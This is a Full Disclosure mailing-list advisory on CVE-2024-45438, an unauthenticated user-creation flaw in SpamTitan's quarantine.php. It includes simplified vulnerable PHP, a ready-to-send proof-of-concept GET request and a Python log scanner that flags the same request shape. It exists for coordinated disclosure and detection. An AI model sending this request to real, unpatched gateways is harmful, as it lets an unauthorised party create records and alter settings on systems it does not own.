Message-ID: <DB3PR10MB680992C20C0DBB10495ABD8ED033A@DB3PR10MB6809.EURPRD10.PROD.OUTLOOK.COM>
Date: Wed, 20 Aug 2025 14:40:55 +0000
From: Seralys Research Team via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] CVE-2024-45438 - SpamTitan Unauthenticated User Creation

    Seralys Security Advisory | https://www.seralys.com/research
	
======================================================================
Title:       Unauthenticated User Creation
Product:     SpamTitan Email Security Gateway
Affected:    Confirmed on 8.00.95 
Fixed in:    8.00.101 and 8.01.14
Vendor:      TitanHQ
Discovered:  May 2024
Severity:    HIGH
CWE:         CWE-306: Missing Authentication for Critical Function
CVE:         CVE-2024-45438
CVSS:        8.6 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)
Discovered by: Philippe Caturegli (Seralys) & Julian B.

======================================================================
Overview
--------

The file `quarantine.php` within the SpamTitan interface allows 
unauthenticated users to trigger account-level actions using a crafted 
GET request. Notably, when a non-existent email address is provided as 
part of the `email` parameter, SpamTitan will automatically create a 
user record and associate quarantine settings with it - all without 
requiring authentication.

This allows an attacker to manipulate internal application behavior 
or inject data into the user base, potentially leading to privilege 
escalation paths or information leaks in misconfigured environments.

======================================================================
Technical Details
-----------------

Affected Endpoint:
------------------
`quarantine.php`

Unauthenticated request triggers user creation:
```
/quarantine.php?language=en&role_type=admin&action=setperiod&email=admin@...acker.com&period=WD&secret_id=1
```

Pseudo-code logic:
```php
// quarantine.php (simplified): acts on the supplied address with no session or auth check
$email = $_GET['email'];
if (!empty($email)) {
    // Second argument omitted, so the helper's $create parameter keeps its default of 1
    $user_id = db_getmaddr_id($email);
}
```

Helper function (simplified behavior):
```php
// Simplified behavior; the db_lookup_maddr_id/db_insert_maddr helpers are placeholder names, not SpamTitan's own
function db_getmaddr_id($email, $create = 1) {
    $id = db_lookup_maddr_id($email);        // NULL when the `maddr` table has no row for $email
    if ($id === null && $create == 1) {
        // Unknown address and $create left at its default: silently add a user record
        $domain = explode('@', $email)[1] ?? '';
        db_insert_maddr($email, $domain);    // INSERT INTO maddr (email, domain)
        $id = db_lookup_maddr_id($email);
    }
    return $id;
}
```

- Because `db_getmaddr_id($email)` is invoked with only one argument,
  the default value `$create = 1` is used, which triggers implicit 
  user creation.
- No session or authentication checks are performed prior to 
  executing the action.
- The `role_type` parameter (e.g., `admin`) is accepted via query 
  string but never validated.

======================================================================
Proof of Concept
----------------

Send the following GET request without authentication:

```
GET /quarantine.php?language=en&role_type=admin&action=setperiod&email=user@...acker.com&period=WD&secret_id=1 HTTP/1.1
Host: spamtitan.local
```

Effect:
- A new user `user@...acker.com` is silently created.
- Digest preference is set to "weekly".
- No authentication or token is required.
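As an added example that is not part of the advisory: a small Python scanner that flags access-log lines matching the request shape shown in the Technical Details and Proof of Concept sections, i.e. `quarantine.php` hits whose `email` parameter belongs to a domain the gateway does not serve (the advisory's non-existent-address case) or that carry `role_type=admin`. The `LOCAL_DOMAINS` set, the log lines and the IP addresses are constructed placeholders, and the combined log format is assumed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" prefix: ip ident user [ts] "METHOD path PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Domains this gateway legitimately serves: an assumed, site-specific value.
LOCAL_DOMAINS = {"example.com", "corp.example.com"}

def classify(line, local_domains=LOCAL_DOMAINS):
    """Return the reasons a log line matches the advisory's pattern ([] if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("path"))
    if not url.path.endswith("/quarantine.php"):
        return []
    q = {k: v[0] for k, v in parse_qs(url.query).items()}
    reasons = []
    email = q.get("email", "").lower()
    # A maddr record is created for whatever address is supplied; a non-local domain is the key signal.
    if "@" in email and email.rsplit("@", 1)[1] not in local_domains:
        reasons.append("email for non-local domain: " + email)
    # role_type comes straight from the query string and is never validated.
    if q.get("role_type") == "admin":
        reasons.append("role_type=admin passed in query string")
    return reasons

def scan(lines, local_domains=LOCAL_DOMAINS):
    """Return [(ip, status, reasons)] for every suspicious line."""
    hits = []
    for line in lines:
        reasons = classify(line, local_domains)
        if reasons:
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), int(m.group("status")), reasons))
    return hits

# Constructed sample lines (not real traffic); the third has the PoC's shape.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/May/2024:10:00:01 +0000] "GET /quarantine.php?language=en&action=setperiod&email=alice@example.com&period=WD&secret_id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/May/2024:10:00:02 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "curl/8.0"',
    '198.51.100.7 - - [12/May/2024:10:00:03 +0000] "GET /quarantine.php?language=en&role_type=admin&action=setperiod&email=user@evil.example&period=WD&secret_id=1 HTTP/1.1" 200 512 "-" "curl/8.0"',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Because the request needs no session, the log alone cannot separate authenticated from unauthenticated callers; an address outside the served domains is the reliable sign that a record was created for a user the gateway should never have known.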

======================================================================
Impact
------

- Unauthenticated creation of internal user records
- Manipulation of quarantine report settings for arbitrary emails
- Potential for denial of service or persistence via spam report 
  hijacking
- Expands the application attack surface for further exploitation

======================================================================
Vendor Response
---------------

TitanHQ implemented fixes for this vulnerability as part of a 
coordinated disclosure effort. 

The issue has been resolved in the following versions: 
- SpamTitan Gateway v.8.00.101 
- SpamTitan Gateway v.8.01.14

Note: if a customer has set the token expiration period to 0 
(disabling tokens), then it would still be possible to add users. 
The quarantine settings page now shows a warning if a customer has 
this set to 0, and going forward it is not possible to set the token 
expiration period lower than 1.

======================================================================
Timeline
--------

- 2024-05-12: Vulnerability discovered during a pentest
- 2025-04-28: Advisory drafted (we kind of forgot about that vuln :))
- 2025-04-28: Initial advisory submitted to TitanHQ
- 2025-05-06: Follow up #1 from Seralys
- 2025-05-16: Follow up #2 from Seralys
- 2025-05-19: TitanHQ acknowledged receipt and initiated coordination
- 2025-06-13: TitanHQ publicly released a fix in v 8.00.101 and 8.01.14
- 2025-08-20: Public disclosure by Seralys

======================================================================
About Seralys
-------------

Seralys is a boutique penetration testing firm with offices in Europe
and North America. We provide high value-add penetration testing and 
security assessments.

https://www.seralys.com

======================================================================
Acknowledgments
---------------

Special shoutout to our fellow researchers at BastardLabs. \m/

======================================================================
Disclaimer
----------

This advisory is provided for coordinated disclosure purposes only.
Reproduction or distribution for malicious use is strictly prohibited.

EOF
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/